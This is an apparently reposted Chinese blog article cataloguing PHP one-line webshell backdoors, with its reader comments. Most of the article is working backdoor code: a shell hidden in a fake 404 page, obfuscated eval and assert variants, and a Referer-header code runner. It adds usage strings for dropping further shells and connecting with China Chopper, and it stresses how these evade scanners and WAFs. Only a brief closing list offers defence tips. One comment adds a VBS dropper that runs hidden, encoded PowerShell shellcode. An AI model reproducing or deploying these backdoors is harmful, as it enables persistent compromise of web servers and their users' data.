后门 - CVE漏洞中文网

那些强悍的PHP一句话后门

oooceo2013-05-10共2440512人围观，发现 51 个不明物体WEB安全

我们以一个学习的心态来对待这些PHP后门程序，很多PHP后门代码让我们看到程序员们是多么的用心良苦。

强悍的PHP一句话后门

这类后门让网站、服务器管理员很是头疼，经常要换着方法进行各种检测，而很多新出现的编写技术，用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。

利用404页面隐藏PHP小马：

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

404页面是网站常用的文件，一般建议好后很少有人会去对它进行检查修改，这时我们可以利用这一点进行隐藏后门。

无特征隐藏PHP一句话：

<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

将$_POST['code']的内容赋值给$_SESSION['theCode']，然后执行$_SESSION['theCode']，亮点是没有特征码。用扫描工具来检查代码的话，是不会报警的，达到目的了。

超级隐蔽的PHP后门：

<?php $_GET[a]($_GET[b]);?>

仅用GET函数就构成了木马；

利用方法：

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

执行后当前目录生成c.php一句话木马，当传参a为eval时会报错木马生成失败，为assert时同样报错，但会生成木马，真可谓不可小视，简简单单的一句话，被延伸到这般应用。

层级请求，编码运行PHP后门：
此方法用两个文件实现，文件1

<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
   eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}

文件2

<?php
//2.php
header('Content-type:text/html;charset=utf-8');
//要执行的代码
$code = <<<CODE
phpinfo();
CODE;
//进行base64编码
$code = base64_encode($code);
//构造referer字符串
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
    CURLOPT_URL => $url,
    CURLOPT_HEADER => FALSE,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);

通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码，来达到后门的效果，一般waf对referer这些检测要松一点，或者没有检测。用这个思路bypass waf不错。

PHP后门生成工具weevely

weevely是一款针对PHP的webshell的自由软件，可用于模拟一个类似于telnet的连接shell，weevely通常用于web程序的漏洞利用，隐藏后门或者使用类似telnet的方式来代替web 页面式的管理，weevely生成的服务器端php代码是经过了base64编码的，所以可以骗过主流的杀毒软件和IDS，上传服务器端代码后通常可以通过weevely直接运行。

weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术，后门中所使用的函数均是常用的字符串处理函数，被作为检查规则的eval，system等函数都不会直接出现在代码中，从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描，结果显示该文件无任何威胁。

以上是大概介绍下边是截图，相关使用方法亦家就不在这介绍了，简单的科普一下。

三个变形的一句话PHP木马
第一个

<?php ($_=@$_GET[2]).@$_($_POST[1])?>

在菜刀里写http://site/1.php?2=assert密码是1

第二个

<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你用菜刀的附加数据的话更隐蔽，或者用其它注射工具也可以，因为是post提交的。

第三个

($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');

str_rot13(‘riny’)即编码后的eval，完全避开了关键字，又不失效果，让人吐血！

最后列几个高级的PHP一句话木马后门：

1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
2、
$filename=$_GET['xbid'];
include ($filename);
//危险的include函数，直接编译任何文件为php格式运行
3、
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件
4、
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
5、include ($uid);
//危险的include函数，直接编译任何文件为php格式运行，POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句话
6、典型一句话
程序后门代码
<?php eval_r($_POST[sb])?>
程序代码
<?php @eval_r($_POST[sb])?>
//容错代码
程序代码
<?php assert($_POST[sb]);?>
//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
<?$_POST['sa']($_POST['sb']);?>
程序代码
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码
<O>h=@eval_r($_POST1);</O>
程序代码
<script language="php">@eval_r($_POST[sb])</script>
//绕过<?限制的一句话

综上，这些PHP一句话后门可谓五脏俱全，一不小心您肯定中招了，而我们今天这篇文章的重中之重在哪呢？重点就在下边的总结!

如何应对PHP一句话后门：

我们强调几个关键点，看这文章的你相信不是门外汉，我也就不啰嗦了：

1，对PHP程序编写要有安全意识
2，服务器日志文件要经常看，经常备份
3，对每个站点进行严格的权限分配
4，对动态文件及目录经常批量安全审查
5，学会如何进行手工杀毒《即行为判断查杀》
6，时刻关注，或渗入活跃的网络安全营地
7，对服务器环境层级化处理，哪怕一个函数也可做规则

我们认为当管理的站点多了，数据量大时，我们应合理应用一些辅助工具，但不应完全依赖这些工具，技术是时刻在更新进步的，最为重要的是你应学会和理解，编写这些强悍后门的人所处思维，角色上的换位可为你带来更大的进步。

via[亦家网络]

这些评论亮了

oooceo(1级)回复

@落叶纷飞以宏观方向展示了各种DIY出来的后门，本文并非是抽象的拿某一例来编写特定后门，所以不要太挑剔，现在的ecshop存在两个内核级后门你能读出来吗？之前被一牛读出来官方死不承认，还有一个一直没人爆出来，强悍不能单一的抽象某个例子。

)32(亮了
anlfi(5级)回复

@oooceo
求解怎么建力数学模来解决抽象问题
微观粒子运动可测吗求解重力的的最小微粒是怎么样的纯在
其实这些后门在以前都用过了但写出来对作者有什么意义呢？呵呵
@落叶纷飞
你是笨蛋吗
所有人都以自己的方式去理解对方的语言以及世界所以每个人都能读出不同的含义
文章也是如此所以只要去取自己有用的部分即可
就像我和你没有关系一样所有人都是如此
看起来比较孤独但其实人生就是这样直到最后也就只有你自己知道死的含义一样
哪怕你再疼苦也不会有人知道你有多疼
所以会诞生除2种性格最求纯在感藐视一切纯在当然还有无所谓的因为现实就是如此
世界就像是一个微观世界充满随机性充满思想的碰撞写文章有意义吗国家有意义吗军队有意义吗
一切只是你认为很重要的东西你才会去做
至于意义就是你去做了并且获得了什么达成了什么目的或者就是为了好玩
然而对于普通人这些根本和他们没有关系
补充一个吧
toby57 早期用的后门
<?php
if(crypt($_SERVER['HTTP_H0ST'],51)=='514zR17F8j0q6'){@file_put_contents($_SERVER['HTTP_X'],$_SERVER['HTTP_Y']);header("Location: ./".$_SERVER['HTTP_X']);};
?>
后门的方式随机性太多了你怎么不去一个一个说出来
所以我认为你很有意思可以玩一玩
但其实和我也没什么关系呢
不知道你是在乎别人对你的存在感还是无所谓呢呵呵
或者面对如此寂寞的世界无视一切
只最求一样东西呢
其实我的回复就只是玩一玩看看到底是你们回复的多还是我回复的多
又或者引导出你们的内心然后出现引导出大量回复来分析人性
不得不说社交的确是一种进步就算你怎么了解人性你也不知道它的魅力所在

)12(亮了
呵呵回复

@anlfi 只能对你说呵呵。那你放个更牛逼的几十种方法出来啊！光说不练，装逼犯

)9(亮了
anlfi(5级)回复

这些后门写的真不安全（不符合安全标准）
POST GET 一些包头参数
直接控制参数变量与函数
一般这种不管是不是后门都会丢下去重做
就是查后门
也只要查多出来的 POST GET Cookie 的一些变量
定位文件就行了
最起码要做到间接利用根据程序本身设计后门
基于校验HASH就不说了
最多只能bypass一些AV了
所谓的强悍也不过就是方法不同而已这么多函数完全可以有N种方法组合自己后门

)8(亮了
落叶纷飞(2级)回复

“最起码要做到间接利用根据程序本身设计后门”
那这篇文章该怎么写？
“所谓的强悍也不过就是方法不同而已这么多函数完全可以有N种方法组合自己后门”
求不用任何函数不用任何代码实现的后门

)7(亮了

发表评论

已有 49 条评论

anlfi (5级) 2013-05-10回复1楼

这些后门写的真不安全（不符合安全标准）
POST GET 一些包头参数
直接控制参数变量与函数
一般这种不管是不是后门都会丢下去重做
就是查后门
也只要查多出来的 POST GET Cookie 的一些变量
定位文件就行了
最起码要做到间接利用根据程序本身设计后门
基于校验HASH就不说了
最多只能bypass一些AV了
所谓的强悍也不过就是方法不同而已这么多函数完全可以有N种方法组合自己后门

亮了(8)
- Mystery。 (6级)肆零叁文化传媒 COO 2013-05-10回复
  
  @anlfi 所谓的强悍，就是变形了一下语句而已。
  
  亮了(4)
  - anlfi (5级) 2013-05-12回复
    
    @Mystery。
    十分赞同！对于喷子最好的办法就是不回复，
    网络上充斥着各种垃圾信息，就是因为总有人回复喷子结果雪球越滚越大
    照成网络垃圾，只要大家行动起来少回一次喷子，就能创建美好网络环境
    对于喷子大家只要不回复对方就会自觉无趣以此逐渐减少喷子的数量
    这样自己也能舒心多了
    对付喷子人人有责
    
    亮了(6)
- 呵呵 2013-05-10回复
  
  @anlfi 只能对你说呵呵。那你放个更牛逼的几十种方法出来啊！光说不练，装逼犯
  
  亮了(9)
  - 楼上是傻X 2013-05-10回复
    
    @呵呵你更装说别人你提出一点有用的东西啊?
    
    亮了(5)
  - Mystery。 (6级)肆零叁文化传媒 COO 2013-05-12回复
    
    @呵呵对于喷子最大的回应就是不说话。
    
    亮了(4)
落叶纷飞 (2级) 2013-05-10回复2楼

“最起码要做到间接利用根据程序本身设计后门”

那这篇文章该怎么写？

“所谓的强悍也不过就是方法不同而已这么多函数完全可以有N种方法组合自己后门”

求不用任何函数不用任何代码实现的后门

亮了(7)
- oooceo (1级) 2013-05-10回复
  
  @落叶纷飞以宏观方向展示了各种DIY出来的后门，本文并非是抽象的拿某一例来编写特定后门，所以不要太挑剔，现在的ecshop存在两个内核级后门你能读出来吗？之前被一牛读出来官方死不承认，还有一个一直没人爆出来，强悍不能单一的抽象某个例子。
  
  亮了(32)
  - 马路一号 2013-05-10回复
    
    @oooceo 内核级什么意思？
    
    亮了(4)
  - 落叶纷飞 (2级) 2013-05-11回复
    
    @oooceo 你看清楚我评论的是啥，喷你的人在上面，哥哥!!
    
    亮了(3)
  - anlfi (5级) 2013-05-11回复
    
    @oooceo
    求解怎么建力数学模来解决抽象问题
    微观粒子运动可测吗求解重力的的最小微粒是怎么样的纯在
    
    其实这些后门在以前都用过了但写出来对作者有什么意义呢？呵呵
    
    @落叶纷飞
    你是笨蛋吗
    所有人都以自己的方式去理解对方的语言以及世界所以每个人都能读出不同的含义
    文章也是如此所以只要去取自己有用的部分即可
    就像我和你没有关系一样所有人都是如此
    看起来比较孤独但其实人生就是这样直到最后也就只有你自己知道死的含义一样
    哪怕你再疼苦也不会有人知道你有多疼
    所以会诞生除2种性格最求纯在感藐视一切纯在当然还有无所谓的因为现实就是如此
    
    世界就像是一个微观世界充满随机性充满思想的碰撞写文章有意义吗国家有意义吗军队有意义吗
    一切只是你认为很重要的东西你才会去做
    至于意义就是你去做了并且获得了什么达成了什么目的或者就是为了好玩
    然而对于普通人这些根本和他们没有关系
    补充一个吧
    toby57 早期用的后门
    <?php
    if(crypt($_SERVER['HTTP_H0ST'],51)==’514zR17F8j0q6′){@file_put_contents($_SERVER['HTTP_X'],$_SERVER['HTTP_Y']);header("Location: ./".$_SERVER['HTTP_X']);};
    ?>
    后门的方式随机性太多了你怎么不去一个一个说出来
    所以我认为你很有意思可以玩一玩
    但其实和我也没什么关系呢
    
    不知道你是在乎别人对你的存在感还是无所谓呢呵呵
    或者面对如此寂寞的世界无视一切
    只最求一样东西呢
    其实我的回复就只是玩一玩看看到底是你们回复的多还是我回复的多
    又或者引导出你们的内心然后出现引导出大量回复来分析人性
    不得不说社交的确是一种进步就算你怎么了解人性你也不知道它的魅力所在
    
    亮了(12)
- oooceo (1级) 2013-05-11回复
  
  @落叶纷飞啊，我知道啊，我是不想回复他们，所以引用了你的回复加以说明，你不要误会哦，我明白汉字的博大，不会这么弱弱的，谢谢！
  
  亮了(3)
- ? 2013-05-14回复
  
  @落叶纷飞飞哥说的对，支持。
  
  亮了(1)
123 2013-05-10回复3楼

比较全面
赞一个

亮了(2)
宋兵乙 2013-05-10回复4楼

最近emlog和hdwiki放的后门真是太明显~~

亮了(5)
颓废傻鱼 2013-05-10回复5楼

都会带Get和Post获取数据，人工审计只要审计这些$_Get和$_Post就可以了，要想隐藏的很好，还是要根据环境来，结合好了，基本很难读出来，除非执行调试

亮了(2)
- oooceo (1级) 2013-05-10回复
  
  @颓废傻鱼差不多，不过对于现状来说，真正做到人工审计的情况非常有限，对普通公司来说甚至可以说稀有。
  
  亮了(3)
asfsdf 2013-05-10回复6楼

"GET函数"
-.-

亮了(2)
alwaystest (1级) 2013-05-10回复7楼

想问一下提到的<?php eval_r($_POST[亲爱的])?>这个一句话，我没找到php有eval_r这个函数，本地测试返回的是Fatal error: Call to undefined function eval_r() in…

亮了(1)
- oooceo (1级) 2013-05-10回复
  
  @alwaystest 定义function eval_r达到某些效果。
  
  亮了(0)
  - alwaystest (1级) 2013-05-12回复
    
    @oooceo 这么定义还是一句话吗？而且这段代码里本来也没给定义的那段啊
    
    亮了(0)
shanshibo (1级) 2013-05-10回复8楼

学习了

亮了(0)
techlivezheng 2013-05-10回复9楼

对于生产环境使用 git 部署，定期检查 HEAD 的 hash 是否改变，也是一个有效的的防止代码被恶意篡改添加后门的办法，毕竟 Git 的设计使得任何篡改都会有一个独特的 hash 值。

亮了(2)
古道安全 2013-05-10回复10楼

推荐阅读！我一直想总结这个呢，谢谢分享~

亮了(0)
带脚镣跳舞 2013-05-10回复11楼

亮了(0)
anlfi (5级) 2013-05-11回复12楼

@落叶纷飞
哇咔咔~落叶纷飞我们继续合作一定能带来更多素材的
你只要一直喷我就好了
就算所有人都知道回复我是错误的选择
但是还是有人会冲动的去想改变别人的想法

就像我只要坐下来泡杯茶给你并且跟你说我很赞同你想和你谈谈
大多数人就会自己走进陷阱里来不用强逼不用绑架如同飞蛾扑火
你可以去看看犯罪心理学罪犯之所以是罪犯就是因为他们善于利用人性
你看我是不是很邪恶？我是坏人吧，尽管诅咒我吧，但其实我都不知道╮(╯▽╰)╭
别和我发好人卡小心我灭了你

亮了(0)
- ay暗影 2013-05-11回复
  
  @anlfi 看不懂你在说啥，貌似很牛逼的样子
  
  亮了(2)
- 落叶纷飞 (2级) 2013-05-11回复
  
  @anlfi 来吧，来灭了我吧，小朋友
  
  亮了(1)
oooceo (1级) 2013-05-11回复13楼

@anlfi
首先这是礼仪问题，你@我，我进行回复@，对于你的观点我完全从来没说过我不赞成或反对，而你也不用来对我或他人发表攻击性言论。但在这我要说，你回复的这句话"其实这些后门在以前都用过了但写出来对作者有什么意义呢？呵呵"，已经完全改变了很多应有的精神。

亮了(3)
- anlfi (5级) 2013-05-11回复
  
  @oooceo
  呵呵我承认我凌乱了
  不过并我没有攻击谁
  你认为是对你的伤害也只能说sorry
  而且只是比喻而已主观上只是想帮你补充一个未收录的后门而已
  还有我并不了解你如果你认为我说的不对不对胃口那就请无视我吧
  其实我也经历过很多这样的说教当你做了很多很多以后
  领导跟你说你做这些又有什么意义我只要能赚钱
  所以你也别太在乎别人那些你观点不同不喜欢的人就别和他说话尽量避免争吵（对方只是无聊的人而已
  有些人喷你写的不好就不高兴有些人说你写的不错你就开心尽量理智应对吧
  
  可见你关注的首先1是礼仪 2是观点 3是理论彼此了解才能有交流对吧
  如果你还有后续文章我会努力关注的
  
  亮了(0)
  - oooceo (1级) 2013-05-11回复
    
    谢谢！
    
    亮了(0)
ZurV2w1n 2013-05-11回复14楼

404页面太猥琐了嘎嘎

亮了(0)
black-world 2013-05-12回复15楼

武术乃千变万化！！！

亮了(0)
玄空 (1级)一个弱弱的小彩笔 2013-05-13回复16楼

404已经快被用烂了吧。个人觉得还是在一些比较隐蔽的页面，比如说top，left啊。比较好，error也是个不错的选择

亮了(0)
Websecurity 2013-05-14回复17楼

哈哈……

亮了(0)
horseluke 2013-05-14回复18楼

有关php后门的延伸阅读，可见monyer在一年前的文章：
http://hi.baidu.com/monyer/item/a218dbadf2afc7a828ce9d63

亮了(0)
- oooceo (1级) 2013-05-14回复
  
  @horseluke 文章引述的国外参考资料非常帅，感谢！
  
  亮了(0)
lkjk 2013-05-14回复19楼

请问这是什么后门？

Set ws = CreateObject("Wscript.Shell")

ws.run "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand JABjAG8AZABlACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3AGkAbgBGAHUAbgBjACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYwBvAGQAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABzAGMANgA0ACAAPQAgADAAeABmAGMALAAwAHgAZQA4ACwAMAB4ADgAOQAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADAALAAwAHgAOAA5ACwAMAB4AGUANQAsADAAeAAzADEALAAwAHgAZAAyACwAMAB4ADYANAAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADMAMAAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADAAYwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEANAAsADAAeAA4AGIALAAwAHgANwAyACwAMAB4ADIAOAAsADAAeAAwAGYALAAwAHgAYgA3ACwAMAB4ADQAYQAsADAAeAAyADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcAYwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4AGUAMgAsADAAeABmADAALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANAAyACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADAALAAwAHgANwA4ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADQAYQAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADUAMAAsADAAeAA4AGIALAAwAHgANAA4ACwAMAB4ADEAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4AGUAMwAsADAAeAAzAGMALAAwAHgANAA5ACwAMAB4ADgAYgAsADAAeAAzADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANAAsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQAyACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxACwAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlAGIALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgAMwAzACwAMAB4ADMAMgAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANwAzACwAMAB4ADMAMgAsADAAeAA1AGYALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeABiADgALAAwAHgAOQAwACwAMAB4ADAAMQAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADIAOQAsADAAeABjADQALAAwAHgANQA0ACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgAMgA5ACwAMAB4ADgAMAAsADAAeAA2AGIALAAwAHgAMAAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADQAMAAsADAAeAA1ADAALAAwAHgANAAwACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgAZQBhACwAMAB4ADAAZgAsADAAeABkAGYALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQA3ACwAMAB4ADYAYQAsADAAeAAwADUALAAwAHgANgA4ACwAMAB4AGMAMAAsADAAeAA0ADUALAAwAHgAYwBjACwAMAB4AGUAMgAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4ADAAMAAsADAAeAAxADUALAAwAHgAYgAxACwAMAB4ADgAOQAsADAAeABlADYALAAwAHgANgBhACwAMAB4ADEAMAAsADAAeAA1ADYALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAA5ADkALAAwAHgAYQA1ACwAMAB4ADcANAAsADAAeAA2ADEALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeAAwAGMALAAwAHgAZgBmACwAMAB4ADQAZQAsADAAeAAwADgALAAwAHgANwA1ACwAMAB4AGUAYwAsADAAeAA2ADgALAAwAHgAZgAwACwAMAB4AGIANQAsADAAeABhADIALAAwAHgANQA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA2AGEALAAwAHgAMAA0ACwAMAB4ADUANgAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMgAsADAAeABkADkALAAwAHgAYwA4ACwAMAB4ADUAZgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgAYgAsADAAeAAzADYALAAwAHgANgBhACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADEAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADUANgAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA1ADgALAAwAHgAYQA0ACwAMAB4ADUAMwAsADAAeABlADUALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADMALAAwAHgANQAzACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANQA2ACwAMAB4ADUAMwAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMgAsADAAeABkADkALAAwAHgAYwA4ACwAMAB4ADUAZgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADAAMQAsADAAeABjADMALAAwAHgAMgA5ACwAMAB4AGMANgAsADAAeAA4ADUALAAwAHgAZgA2ACwAMAB4ADcANQAsADAAeABlAGMALAAwAHgAYwAzADsAWwBCAHkAdABlAFsAXQBdACQAcwBjACAAPQAgACQAcwBjADYANAA7ACQAcwBpAHoAZQAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJABzAGMALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQAgAHsAJABzAGkAegBlACAAPQAgACQAcwBjAC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwBpAG4ARgB1AG4AYwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHMAaQB6AGUALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAaQBuAEYAdQBuAGMAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB4AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJABzAGMAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAaQBuAEYAdQBuAGMAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQAgAHsAIABTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAIAB9ADsA",vbhide

亮了(5)
global_hacker (4级) 2013-05-15回复20楼

哈哈 404 使用的是很烂了但是还哦是有用啊

亮了(1)
- 玄空 (1级)一个弱弱的小彩笔 2013-05-23回复
  
  @global_hacker error已经成为了我们的新欢了
  
  亮了(0)
mark 2013-05-20回复21楼

小舟pxz,【那些强悍的PHP一句话后门】收藏成功。本文正文大约需要10分钟的阅读时间，请访问稍后再读! 你可以关注获得私信提醒。

亮了(2)
墨客 (1级) 2013-05-21回复22楼

程序代码
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码
<O>h=@eval_r($_POST1);</O>

请问为什么要在配置里加那一段代码，我测试了下，不加可以直接连；那个eval_r()是什么函数？前面也见你有提到。

亮了(1)
- IDE (1级) 2017-01-18回复
  
  @ 墨客加了反而连不上
  
  亮了(0)
splio_testing 2013-05-21回复23楼

good job

亮了(0)
John 2013-06-07回复24楼

能不能修改下网页格式，我用印象收藏文章后，格式会发生严重变形

亮了(0)
ppabc (1级) 2014-07-03回复25楼

学习了哈哈

亮了(0)
杨毅 (1级) 2015-05-11回复26楼

我拿360主机卫士跑了下上面给的例子，好像都能查杀出来。

亮了(2)
- IDE (1级) 2017-01-16回复
  
  @ 杨毅请问404的那个马咋使用的
  
